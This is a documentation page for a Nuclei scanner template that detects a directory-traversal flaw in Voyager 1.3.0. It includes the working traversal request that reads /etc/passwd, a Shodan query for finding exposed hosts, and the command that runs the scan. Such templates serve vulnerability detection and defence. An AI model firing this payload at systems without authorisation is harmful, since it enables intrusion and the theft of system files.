Voyager 1.3.0 - Directory Traversal
ID: voyager-lfi
Severity: high
Author: mammad_rahimzada
Tags: voyager,lfi
Description
Section titled “Description”Voyager 1.3.0 is vulnerable to local file inclusion.
YAML Source
Section titled “YAML Source”id: voyager-lfi
info: name: Voyager 1.3.0 - Directory Traversal author: mammad_rahimzada severity: high description: | Voyager 1.3.0 is vulnerable to local file inclusion. reference: - https://www.exploit-db.com/exploits/47875 classification: cvss-score: 7.5 cwe-id: CWE-22 cpe: cpe:2.3:a:voyager_project:voyager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"voyager-assets" product: voyager vendor: voyager_project tags: voyager,lfi
http: - method: GET path: - "{{BaseURL}}/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd"
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"
- type: word part: header words: - "text/plain"
- type: status status: - 200# digest: 4a0a004730450220352cac1f0deebadb2b2e89fe464a6816d705f5f45ec1db91c85df633234f86ac022100928fc2fab3a97342e038bbe1bc4a4f183e60f2b7728854962ab3b730dbe12530:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/voyager-lfi.yaml"